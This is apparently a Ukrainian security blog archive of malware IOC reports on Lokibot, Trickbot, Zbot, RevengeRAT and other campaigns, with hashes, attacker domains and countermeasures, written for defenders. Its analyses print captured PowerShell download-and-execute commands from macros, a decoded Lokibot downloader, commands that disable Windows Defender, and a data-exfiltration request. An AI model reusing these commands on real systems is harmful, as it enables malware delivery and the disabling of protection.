Tag Archive | VBA

IOC_digest_04_2019

(Зразки за квітень 2019го)

Продовжуючи формат переднього дайджесту, ось вам перелік зразків, результати аналізу яких я можу оприлюднити.

Їх було не так багато, як у березні, проте схеми доставки були досить цікавими.

08/04/19

розсилали #AZORult, .ZIP > .LNK > GET .HTA > PowerShell > GET .GIF(EXE) > %Public%\???.exe > %AppData%\0mbii\gsir.exe , звіт

11/04/19

розсилали #revengeRAT, .xlam / .doc > mshta GET pastebin1 > powershell > GET pastebin2 (base64) > run decoded exe in memory(!) , звіт

22/04/19

розсилали #formbook, attach .RAR > .EXE  , звіт

25/04/19

розсилали #nanocore, attach .doc (RTF) > OLE > 2 excel > macro_URLDownloadToFileA > GET 1 URL > .exe , звіт

– – – – – – – – – – – – – – – – – – – – – – –

Аналітика

Методи доставки

Якщо розбити по категоріям, тоді отримаємо

  • exe/scr (без приманки) – 1 розсилка
  • RTF (OLE) – 2 розсилки
  • макроси – 2 розсилки
  • powershell2 розсилки

Схоже, що документи із вразливістю 11882 та скрипти WSH втрачають позиції. Або просто на них вже не звертають уваги.

Для обходу фільтрів були застосовані наступні кроки:

  • обфускація команд PowerShell (2);
  • Документи з макросами (1) та документи з OLE (1)

Тенденції

  • PowerShell залишається одним із основних інструментів доставки та виконання payload
  • Доставку та трафіку зі С2 все частіше переводять на HTTPS або ж кодують через B64/XOR
  • Крім 1 зразка, усі інші, залишають сліди через закріплення в реєстрі ОС
  • Посилюється роль додатків MS Office в завантаженні payload

Цікавими з технічної точки зору за березень виявилися два випадки:

  • #revenge #RAT за 11/04 – powershell декодував payload і виконував його в своєму контексті
  • #nanocore #RAT за 25/04 – приманка була подвійною, у RTF файлі через OLE були дві таблиці Excel із макросами

Загалом, усе, що присилали в березні могло створити інциденти тим організаціям які:

  • не оновлюють MS Office та ОС
  • не блокують запуск макросів
  • не відмовилися від RTF
  • не заборонили виклик PowerShell та інших вбудованих механізмів ОС (mshta, cmd etc)
  • не контролюють GET запити на Proxy по User Agent

Узагальнені контрзаходи

  • встановлення виправлень MS Office
  • посилена фільтрація вмісту приєднань – як по типу так і по розширенню
  • заборона запуску cmd, powershell та ?script для рядових користувачів
  • блокування web запитів з пустим або застарілим полем User Agent

Будьте уважні та обережні.

VR

Advertisements

IOC_lokibot_161018

16/10/18 проходила розсилка #lokibot

Схема:
email > attach XLS > VBA > powershell > GET > %userprofile%\MyP8Mihuih.exe

Мережеві маркери:
– – – – – – – – – – – – – – – – – –
181.174.165.161 octap{.} igg{.} biz GET /01/chri1.jpg HTTP/1.1 (!) no User Agent
103.109.184.60 octone{.} igg{.} biz POST /chri1/cgi.php HTTP/1.0 (!) Mozilla/4.08 (Charon; Inferno) < #Lokibot User Agent
# # #

Більше маркерів (чорновик звіту) за посиланням:
https://pastebin.com/LPqjHUkQ

Контрзаходи:

• Блокуйте запуск макросів
• Контролюйте нетипові виклики powershell
• Контролюйте трафік powershell
• Забороняйте/контролюйте створення .exe у C:\Users\
• Блокуйте на Proxy нетипові User Agent.

Будьте уважні та обережні.

VR

malware

Невивчені уроки або логи антивірусних війн

12/07/18 доповідав про наші досягнення у розрізі аналізу шкідливого коду та методів його доставки.

Контент суто технічний. Без прив’язки до конкретних вендорів чи рішень.

Презентацію можна переглянути/взяти тут

Основні тези:

  • Поточні ситуація по атакам (масові)
  • Гучні атаки 2017го (wcry, xdata, eternalpetya, badrabbit…)
  • Не правильні висновки
  • Реагування на інциденти
  • Технічні моменти захисту

Розповів про типові помилки при реагуванні на інциденти та навів приклади дієвих контрзаходів.

Кому зі slideshare не зручно – беріть у вигляді pdf (~4 Mb)

Сподіваюсь, знання стануть у нагоді.

Будьте уважні та обережні.

VR

IOC_Trickbot_040718

Доброго ранку, панове.

 

Вчора отримали на аналіз зразок документу з макросом, активація якого призводить до інфікування #Trickbot.

Обидва джерела досі активні, а основне тіло активно передає інформацію з інфікованих систем.

Є відмінності в способі доставки порівняно із зразком який ми розглядали 11/06.

Рівень загрози, для організацій котрі не блокують макроси, не контролюють PowerShell – високий.

А для тих, хто уважно читає наші поради – низький.

Нагадую, що #Trickbot є модульним ШПЗ, яке використовується для збору даних та стеження.

Може довантажувати різні модулі для шифрування або віддаленого керування.

На що треба звернути увагу:

  • Обидва сервери, що розповсюджують частини malware досі активні
  • Сервер контролю той же самий що і 11/06
  • Передача зібраних даних із User Agent ‘Test’
  • Завантаження payload силами powershell через його виклик з cmd
  • Шлях та ім’я з яким записується і запускається payload рандомні
  • Payload не кодований (!This program cannot be run in DOS mode.)
  • Payload завантажуєтеся по захищеному протоколу (Cloudflare)
  • Виконання проходить із затримкою ~2-3 хв
  • Зразок не зачищає за собою файли у %tmp% після міграції в %apdata%
  • Спроб закріплення не проводив
  • Натомість намагається відключити Windows Defender
  • Перевірку IP та звернення до Windows Update здійснює основне тіло
  • Зразок також довантажує з windowsupdate.com кореневі сертифікати
  • А от передача зібраних даних уже через інжектований svchost
  • Прав Адміністратора не потребує

І так, проблеми будуть у тих, хто:

  • Не блокують макроси (90% державних установ)
  • Не заборонили завантаження через powershell (більше 50% організацій)
  • На блокують несанкціоноване завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)

Схема атаки:

Email attach (.doc) > vba macro > cmd > powershell > 2 URL > GET bri.ri > %tmp%\%random%.exe

Маркери IOC:

документ

SHA-256    fe0f98f1f0f64564150aa919ed1eed350ec6bec96eba7e08a605124afa6fe6aa
File name   in.doc
File size      80.5 KB

 

Макрос містить 2 URL:

h11p:\meanmuscles{.} com/bri.ri  + active
h11p:\icoindna{.} io/bri.ri      + active

 

основна частина

SHA-256        481fda910780812056f5dbe6a5f534ad114b527f0386933febca56b738300b54
File name   bri.ri  >> %tmp%\%random%.exe !This program cannot be run in DOS mode.
File size      316 KB

 

Відкриває з’єднання із С2

h11p\188.124.167.132:8082 POST /ser0704/hostname.UID     HTTP/1.1    test (UA)

минулого разу:
h11p\188.124.167.132:8082 POST /ser0611/hostname.UID     HTTP/1.1    test (UA)

 

Активність по процесам:

“C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE” /n /dde

C:\Windows\SysWOW64\cmd.exe /c powershell “‘powershell “”function dodjq([string] $aoumq){(new-object system.net.webclient).downloadfile($aoumq,”%tmp%\uauuind.exe”);start-process ”%tmp%\uauuind.exe”;}try{dodjq(”h11p:\icoindna {.}io/bri.ri’‘)}catch{dodjq(”h11p:\meanmuscles {.}com/bri.ri”)}'”” | out-file -encoding ascii -filepath %tmp%\wswjdpihx.bat; start-process ‘%tmp%\wswjdpihx.bat’ -windowstyle hidden”

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell  “‘powershell “”function dodjq([string] $aoumq){(new-object system.net.webclient).downloadfile($aoumq,”C:\tmp\uauuind.exe”);start-process ”C:\tmp\uauuind.exe”;}try{dodjq(”h11p:\icoindna {.}io/bri.ri”)}catch{dodjq(”h11p:\meanmuscles {.}com/bri.ri”)}'”” | out-file -encoding ascii -filepath C:\tmp\wswjdpihx.bat; start-process ‘C:\tmp\wswjdpihx.bat’ -windowstyle hidden”

C:\Windows\SysWOW64\cmd.exe  /c “”C:\tmp\wswjdpihx.bat” “

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell  “function dodjq([string] $aoumq){(new-object system.net.webclient).downloadfile($aoumq,’C:\tmp\uauuind.exe’);start-process ‘C:\tmp\uauuind.exe’;}try{dodjq(‘h11p:\icoindna {.}io/bri.ri’)}catch{dodjq(‘h11p:\meanmuscles {.}com/bri.ri’)}

“C:\tmp\uauuind.exe”

C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend

C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend

C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Users\operator\AppData\Roaming\msscsc\uauuind.exe

C:\Windows\system32\svchost.exe

 

Зверніть увагу на рандом макросу:

1st run

——-

cmd /c powershell “‘powershell “”function ysga([string] $bmecmdmov){(new-object system.net.webclient).downloadfile($bmecmdmov,”%tmp%\xpvsvgw.exe”);start-process ”%tmp%\xpvsvgw.exe”;}try{ysga(”h11p:\icoindna{.} io/bri.ri”)}catch{ysga(”h11p:\meanmuscles{.} com/bri.ri”)}'”” | out-file -encoding ascii -filepath %tmp%\dduuyd.bat; start-process ‘%tmp%\dduuyd.bat’ -windowstyle hidden”

 

2nd run

——-

cmd /c powershell “‘powershell “”function bxode([string] $wxhfe){(new-object system.net.webclient).downloadfile($wxhfe,”%tmp%\nsxr.exe”);start-process ”%tmp%\nsxr.exe”;}try{bxode(”h11p:\icoindna{.} io/bri.ri”)}catch{bxode(”h11p:\meanmuscles{.} com/bri.ri”)}'”” | out-file -encoding ascii -filepath %tmp%\ktph.bat; start-process ‘%tmp%\ktph.bat’ -windowstyle hidden”

 

3rd run

——-

cmd /c powershell “‘powershell “”function nnpsd([string] $knhvd){(new-object system.net.webclient).downloadfile($knhvd,”%tmp%\bixi.exe”);start-process ”%tmp%\bixi.exe”;}try{nnpsd(”h11p:\icoindna{.} io/bri.ri”)}catch{nnpsd(”h11p:\meanmuscles{.} com/bri.ri”)}'”” | out-file -encoding ascii -filepath %tmp%\wjqw.bat; start-process ‘%tmp%\wjqw.bat’ -windowstyle hidden”

 

Збір інформації вбудованими засобами ОС:

C:\Windows\system32\cmd.exe /c ipconfig /all

C:\Windows\system32\cmd.exe /c net config workstation

C:\Windows\system32\cmd.exe /c net view /all

C:\Windows\system32\cmd.exe /c net view /all /domain

C:\Windows\system32\cmd.exe /c nltest /domain_trusts

C:\Windows\system32\cmd.exe /c nltest /domain_trusts /all_trusts

 

Мережеві IOC:

Завантаження основного тіла:

104.27.25.56      icoindna {.}io               GET /bri.ri HTTP/1.1     noUA
68.65.120.85      meanmuscles{.} c0m           GET /bri.ri HTTP/1.1     noUA

Минулого разу:
68.65.120.85      onetimewonders{.} c0m       GET /no.bin HTTP/1.1   noUA

 

Перевірка Public IP:

34.224.244.1      checkip.amazonaws {.}com  GET / HTTP/1.1   Mozilla/5.0

 

Передача інформації про інфіковану систему:

188.124.167.132:8082         POST /ser0704/hostname_UID HTTP/1.1 test

 

Трафік інфікованої системи:

[System Process] 49167        83.220.168.209   447   TIME_WAIT                                                                       
svchost.exe        49165        109.234.34.106   443   ESTABLISHED                                                                            
svchost.exe        49170        188.124.167.132 8082 CLOSE_WAIT                                                                             
svchost.exe        49171        109.234.34.106   443   ESTABLISHED                                                                            
svchost.exe        49172        62.140.236.163   80     ESTABLISHED

 

Яку інформацію отримують нападники:

 

POST /ser0704/hostname_UID HTTP/1.1
Content-Type: multipart/form-data; boundary=Arasfjasu7
User-Agent: test
Host: 188.124.167.132:8082
Content-Length: 5007
Cache-Control: no-cache

--Arasfjasu7

Content-Disposition: form-data; name="proclist"

                ***PROCESS LIST***

[System Process]
System
smss.exe
csrss.exe
wininit.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
lsm.exe
svchost.exe
...

--Arasfjasu7
Content-Disposition: form-data; name="sysinfo"

                ***SYSTEMINFO***

Host Name - APM11
OS Name - Microsoft Windows 7 ..........................
OS Version - Service Pack 1
OS Architecture - 64-bit
Product Type - Workstation
Build Type - Multiprocessor Free
Registered Owner - operator
Total Physical Memory - 2371 Mb
Available Physical Memory - 2371 Mb

                /c ipconfig /all

                /c net view /all

                /c net view /all /domain

                /c nltest /domain_trusts

                /c nltest /domain_trusts /all_trusts

--Arasfjasu7--
HTTP/1.1 200 OK
server: Cowboy
date: Wed, 04 Jul 2018 18:34:28 GMT
content-length: 3
Content-Type: text/plain
- - - - - - - - - - - - - - - - - - - 

Контрзаходи:

  • Перевірка журналів мережевого обладнання на наявність з’єднань із С2
  • Блокування на Proxy вихідних з’єднань без User Agent та з UA ‘test’
  • Блокування несанкціонованої доставки запускних на рівні Web та Email шлюзів
  • По можливості – відмова від макросів
  • Заборона запуску дочірніх процесів для додатків MS Office, mshta.exe, powershell та cmd – користувацьке правило Access Protection (McAfee ENS)
  • Заборона специфічного виклику PowerShell – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона мережевої активності для PowerShell – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталогах C:\Users\**\
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_vba_d0c_worm_140318

14го березня було зафіксовано масове зараження документів MS Office троянським шкідливим кодом.

Рівень загрози для організацій що використовують макроси – високий.

Для тих, хто врахував наші попередні рекомендації – низький.

Рекомендуємо ознайомитися особливо тим, у кого макроси не вимкнуті.

Чому така затримка із остаточними результатами?

Аналіз зайняв більше часу, оскільки спершу зразок не запускався як слід на різних тестових ВМ (включаючи хмарні sandbox).

Ми навіть зібрали фізичний стенд навмисне для аналізу цього зразка, але і на ньому з першого разу не отримали чітких результатів.

Та от нарешті уся інформація була зібрана і ми ділимося нею з вами. Зразок не є чимось дуже небезпечним, але його механіка нетипова і відрізняється від того, що нам надсилали на аналіз останнім часом.

Трохи аналітики:

  • Мережевих з’єднань не здійснює. Взагалі. Жодних.
  • Запуск основної частини не залежить від прав користувача та параметрів UAC
  • Збій в роботі основного тіла який ми отримали на ВМ був спричинений версією MS Office
  • З іншою (новішою) збіркою MS Office зразок без проблем працює як на фізиці та і у ВМ
  • Перевірки віртуалізації немає, це була не цільова атака
  • Призначений для запуску на Windows NT6.x, на ХР по замовчуванню відсутній каталог C:\Public (відповідно макрос не спрацьовує)
  • Регіональні параметри (локалізація, розкладки клавіатури) на виконання не впливають
  • Якщо з обмеженими правами відкривати інфікований документ -не додає себе у автозавантаження (логічно, HKLM)
  • Якщо з обмеженими правами запускати основне тіло – файли не інфікуватиме
  • Зразок модифікує лише файли старого типу, а саме MS Word 2003 (.doc), інші – не чіпає
  • Пошук файлів здійснюється за розширенням
  • Основне тіло здійснює пошук файлів по каталогу користувача (тобто і Робочий стіл І Мої документи та далі по списку)
  • Зміст документів не спотворюється, додається лише VBA код
  • Зразок вперше було помічено 2,5 роки тому (тому відкидаємо припущення про цільову атаку)
  • Механізм доставки наразі не встановлено (ймовірно інфікований документ із макросом)
  • Основне тіло записується та запускається із C:\Users\Public\ctrlpanel.exe

Результат інфікування наведено нижче.

Погляньте на тестові документи до зараження:

 

А ось ті ж самі файли вже після запуску основного тіла:

На перший погляд все нормально, проте зверніть увагу на розмір документу Test clean file2.doc У нього інжектовано VBA код.

Його відкриття запустить процес знову.

Теж саме ще раз:

На знімку екрану чітко видно збільшений розмір doc3

(98 Кб при початкових 22 Кб) – результат інжекту VBA коду.

Нижче наведений граф зв’язків інфікування чистого документу (doc2) через відкриття зараженого (infected):


Маркери IOC:

Основна частина:

SHA-256        10e720fbcf797a2f40fbaa214b3402df14b7637404e5e91d7651bd13d28a69d8
File name   ctrlpanel.exe
File size      34.5 KB

Активність по процесам:

Після відкриття інфікованого документу макрос видобуває основне тіло, записує його на диск та запускає

"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n /dde
c:\Users\Public\ctrlpanel.exe

Основна частина проводить закріплення через реєстр

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\CtrlPanel

Далі зразок розпочинає пошук документів у каталозі користувача та інжектує код VBA знайдені документи

C:\Users\%name%\*.doc

Паралельно ініціюється запуск другого екземпляру Winword

"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /Automation -Embedding

Знайдені *.doc файли переписуються в каталог %temp% де модифікуються другим процесом Winword, далі ctrlpanel заміняє зміст почткових документів (дописує).


Механізм інфікування (повна ланка)

Winword(1st) > open infected.doc > VBA > C:\Public\ctrlpanel.exe > query C:\Users\%name%\*.doc >

Winword(2nd)_ invoked by ctrlpanel > copy *.doc to %temp% > inject VBA > rewrite source *.doc (cycle)

 

Жертва відкриває інфікований документ.

Якщо макроси дозволені або жертва погодилася на активацію – макрос записує основне тіло у C:\Public\

Після запуску процес основного тіла намагається закріпитися через реєстр та шукає *.doc у каталозі користувача

Паралельно із пошуком процес ctrlpanel ініціює запуск другого екземпляру Winword але не як батьківський процес

Другий екземпляр winword запускається від імені svchost.exe (DCOM Server) без GUI. Ключова відмінність наявність параметрів /Automation -Embedding

Потім знайдені *.doc файли (включаючи інфікований) копіюються процесом ctrlpanel у %temp%, де модифікуються другим процесом Winword.

Після інжекту VBA коду, зміст початкових файлів перезаписується процесом ctrlpanel.

Далі іде цикл (безперервне виконання на одній із ВМ протягом 1 години і довше)


Механізм інфікування (запуск лише основного тіла)

C:\Public\ctrlpanel.exe > query C:\Users\%name%\*.doc >

Winword(2nd)_invoked by ctrlpanel > copy *.doc to %temp% > inject VBA > rewrite source *.doc (cycle)

 

Після запуску процес основного тіла намагається закріпитися через реєстр та шукає *.doc у каталозі користувача

Паралельно із пошуком процес ctrlpanel ініціює запуск другого екземпляру Winword але не як батьківський процес

Другий екземпляр winword запускається від імені svchost.exe (DCOM Server) без GUI. Ключова відмінність наявність параметрів /Automation -Embedding

Потім знайдені *.doc файли копіюються процесом ctrlpanel у %temp%, де модифікуються другим процесом Winword.

Після інжекту VBA коду, зміст початкових файлів перезаписується процесом ctrlpanel.

Далі іде цикл (безперервне виконання на одній із ВМ протягом 1 години і довше)

 


Висновки:

  1. Інфікує тільки *.doc файли у каталозі користувача
  2. Системи із ХР не інфікуються, проте можуть виступати у якості вектору
  3. Крім інжекту VBA коду в документи іншої шкоди не зафіксовано
  4. Спроб мережевих комунікацій чи модифікації параметрів ОС (крім закріплення) не зафіксовано
  5. Це не цільова атака, враховуючи давність зразка швидше за все хтось відкопав старий інфікований документ

Контрзаходи:

  • В черговий раз звертаємо увагу на макроси. Вимикайте їх якщо вони не є критичним для штатного режиму роботи.
  • Блокування створення та запуску нових .exe файлів за шляхом C:\Users\**\*.exe (користувацьке правило Access Protection)
  • Заборона створення усіх дочірніх процесів для додатків MS Office крім виключень (користувацьке правило Access Protection)
  • Заборона запуску winword від імені svchost (користувацьке правило Access Protection)
  • Заборона реєстрації в переліку автозавантажень (вбудоване правило Access Protection)
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

У зв’язку із даним інцидентом ще раз звертаємо вашу увагу на покрокову інструкцію по ENS (користувачі VSE можуть налаштувати Access Protection по аналогії).

Не чекайте сигнатур. Перевірте, чи вжили ви усіх пересторог аби макроси не наробили вам біди?

Будьте уважні та обережні.

VR

IOC_lokibot_140318

Доброго дня, панове.

Вчора було зафіксовано чергову розсилку #lokibot під виглядом сповіщення служби доставки DHL.

На відміну від ISO (01/03) та RTF із 11882 (13/03), цього разу – документ Excel із макросом.

Рівень загрози – середній.

Для тих, хто врахував наші попередні рекомендації – низький.

Трохи аналітики:

  • Доставка через XLS документи, макрос передає кодовані інструкції на PowerShell
  • Адреса завантаження та ім’я файлу чітко задані інструкціями
  • Завантаження основної частини засобами процесу PowerShell
  • Хостинг основної частини та С2 один і той же хост
  • Основна частина записується у AppData а не у Temp
  • Запуск шкідливого коду не потребує прав Адміністратора
  • Зупинити атаку можна застосувавши один із шести(!) способів (див. розділ Контрзаходи)
  • Спроб закріплення не проводив
  • Даний тип ШПЗ застосовується для збору інформації та крадіжки облікових даних
  • Будуть повторні спроби доставки із перебором інших типів приманок та обгорток
  • Користувачі McAfee (VSE/ENS) зверніть увагу – payload визначається по DAT.

Схема атаки:

email > (Attach) .xlam > EXCEL > VBA > CMD > PowerShell GET h11p:\ocha-gidi{.} xyz/x/Order.exe> $env:Appdata+'\NtbCQbOq.exe'

Маркери IOC:

Документ-приманка:
SHA-256        70ee8c354807af2f2e0b33a5954bbd3beb3f654aa03f03d89bc43a5aa3e32de4
File name   senders info&parcel details.xlam
File size      63.8 KB

Основна частина:

SHA-256        77807f48686ae3c4920a4eda55e979d62cd5419ea900049119f005cf9b475c76
File name   Order.exe >> $env:Appdata+'\NtbCQbOq.exe'
File size      1.47 MB

Мережеві IOC:

Завантаження основної частини через PowerShell

111.90.147.140   ocha-gidi{.} xyz   GET /x/Order.exe HTTP/1.1

З’єднання із C2

111.90.147.140   xyz-storez{.} xyz   POST /secure/Panel/five/fre.php HTTP/1.0    Mozilla/4.08 (Charon; Inferno)

Тут ключовий момент – User Agent, який використовує #lokibot:

POST /secure/Panel/five/fre.php HTTP/1.0

User-Agent: Mozilla/4.08 (Charon; Inferno)

Host: xyz-storez{.} xyz

Accept: */*

Content-Type: application/octet-stream

Минулі розсилки:

185.148.146.121   Excellog{.} org     POST /Chisom/five/fre.php HTTP/1.0          Mozilla/4.08 (Charon; Inferno)
82.118.242.100   kelsandsons{.} info  POST /kelvin/Panel/five/fre.php HTTP/1.0    Mozilla/4.08 (Charon; Inferno)

Активність по процесам:

При відкритті документу активується макрос

"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e

"C:\Windows\System32\cmd.exe" & /c pOWErshELL -EncODeDCOMmaNd ZgB1AG4AYwB0AGkAbwBuACAAcgBjAG8AeQBlAFUASwBXAFIAeQB2…

pOWErshELL  -EncODeDCOMmaNd ZgB1AG4AYwB0AGkAbwBuACAAcgBjAG8AeQBlAFUASwBXAFIAeQB…

"C:\Users\operator\AppData\Roaming\NtbCQbOq.exe"

Декодуємо base64:

(нетипова функція, імпровізують, зверніть увагу на каталог – не %temp%, а AppData\Roaming)

function rcoyeUKWRyvkuPVibYUewthwpUs

( $zSUdVuzXtPMuooDPKODOyYtb , $sHktyvsIJcLDwUZqurbSPefp )

{(New-Object System.Net.WebClient).DownloadFile( $zSUdVuzXtPMuooDPKODOyYtb , $sHktyvsIJcLDwUZqurbSPefp );

(New-Object -com Shell.Application).ShellExecute( $sHktyvsIJcLDwUZqurbSPefp ); }

try{

kill -processname EXCEL;

$ucFaRAYiGNxYCuMin=$env:Appdata+’\NtbCQbOq.exe’;

rcoyeUKWRyvkuPVibYUewthwpUs ‘h11p:\ocha-gidi{.} xyz/x/Order.exe’ $ucFaRAYiGNxYCuMin;

}catch{}

Контрзаходи:

  • Блокування мережевих запитів із локальної мережі з User Agent Mozilla/4.08 (Charon; Inferno)
  • Заборона запуску макросів (параметри пакету MS Office або реєстр ОС або GPO)
  • Блок запуску дочірніх процесів для додатків MS Office (Excel > CMD > PowerShell) – GPO або правило Access Protection
  • Блок запуску PowerShell з кодованими командами – GPO або сигнатури блоку Exploit Prevention ENS
  • Блокування доступу до мережі Інтернет для процесів PowerShell (варіант 1й)
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%
  • Посилена фільтрація передачі запускних файлів по каналам Web та Email (payload не кодований)
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії
  • з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

Увага! Zbot, чергова хвиля розсилки

Позов_примірник, Угоду_про_видачу_безготівкового, Договір_займу

macro

Вчора близько 15-ї години відбувалася масова розсилка нової модифікації Zbot (ZeuS). З ним ми уже стикалися раніше.

Цього разу фішингові листи містили начеб-то інформацію про непогашений кредит від відомих українських банків:msg2

msg1

І хоча відсутність підписів у корпоративному стилі (!), а головне – скриньки із домену @t-online.de (які не мають відношення до банків) мають насторожити обережного користувача, варто припустити, що частину людей могли ввести в оману. Не важко здогадатися, що не дивлячись на різний зміст листів та різні адреси, начинка документу була однакова. Але про все по порядку:

1)Маркери компрометації:

Received: from mailout09.t-online.de (194.25.134.84) / Received: from mailout05.t-online.de (194.25.134.82)

Документ SHA256=9b4266b05f072a270457198f7212cac0a8fce1ac30d501f214b2a38f20ba6317

dropper SHA256=ba4fe9d9c3138f9ea2caf0d628b0334447d93f301d916f5fdb62dabc115bec5f

payload завантажується звідси hххp://elfaroconsultants.com/safari/content.bin

Типово. що на момент розсилки файли мали дуже низький рейт згідно VirusTotal:

vt2 vt1

oletools красномовно застерігають від необачних кроків:

Screenshot_2016-07-14_16-09-25

2)Механізм активації та компрометації системи:

Якщо жертва відкрила приєднання, то на неї чекатиме прохання активувати макроси. macro2

Так, перед нами уже знайомий тип оболонки – це W97M/Downloader, який містить макрос, що передає інструкції на PowerShell. На відміну від Cerber, приманка якого використовувала base64 обфускацію команд,в даному випадку зловмисники вирішили не витрачати на це часу, тож ми можемо одразу побачити

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();
(New-Object System.Net.WebClient).DownloadFile(‘hххp://elfaroconsultants.com/safari/content.bin’, $f);(New-Object -com WScript.Shell).Exec($f)

Потрібно зазначити іще одну відмінність – запуск коду прив’язаний не до активації макросу, а до закриття файлу. Це новий елемент, раніше мені таке не траплялося.

Отже макрос змушує PowerShell ініціювати завантаження файлу:

netwrk

Завантажений payload зберігається у каталозі %tmp% із довільним іменем і запускається на виконання:

autorun

Після певної затримки payload копіює свої тельбухи у AppData\Locla\ , реєструє себе на автозавантаження та інжектує explorer.exe

inj2

recovery

trapsDLL

За рахунок останнього відбувається самовідновлення файлів вірусу при спробі видалити його елементи із AppData\Local . Не обійшлося і без фірмової “фішки” zbot – при відновленні він генерує новий файл із новим іменем та іншою контрольною сумою.

Продовження аналізу буде трохи згодом.

3) Проміжні висновки

  • Вони (зловмисники) починають приділяти увагу змісту. Варто очікувати нових ідей стосовно боргів/кредитів і таке інше.
  • Звертайте увагу на оформлення листів – які б важливі речі в них не писали, підробку можна відрізнити по оформленню та адресам.
  • Поєднання W97M.downloader + powershell зараз в тренді тому контролюйте мережеву активність даного компоненту.
  • Початкова фаза активації проходить через %temp% проте без .exe
  • Блокувати запуск із %appdata% як раніше потрібно, але в даному випадку вже трохи запізно
  • Для нормального захисту потрібно або вирізати макроси на рівні поштового серверу/шлюзу, або ж застосовувати на кінцевих точках альтернативний захист (не антивірус)
  • Варто готуватися до більш складного та витонченого обману. Ми бачимо, що зловмисники витратили час на підготовку. Наступного разу вони змінять адреси, скопіюють оформлення листів і вже більше людей “на автоматі” відкриють приєднання – питання лише в тому, чи буде активовано макроси (чи там буде щось інше)? Не розслабляйтеся і пам’ятайте, що безпека ваших систем і даних залежить від вас самих.

Будьте уважними та обережними при роботі з ІТ, особливо при роботі з електронними листами.

— Не было количества, вот ведь в чём дело. Одно лишь качество переменилось вдруг. Радикально. В одночасье. Как взрыв.

MV5BMTk1NTc2NjYxNF5BMl5BanBnXkFtZTcwNzA0Njg0Mw@@._V1_SX640_SY720_

VR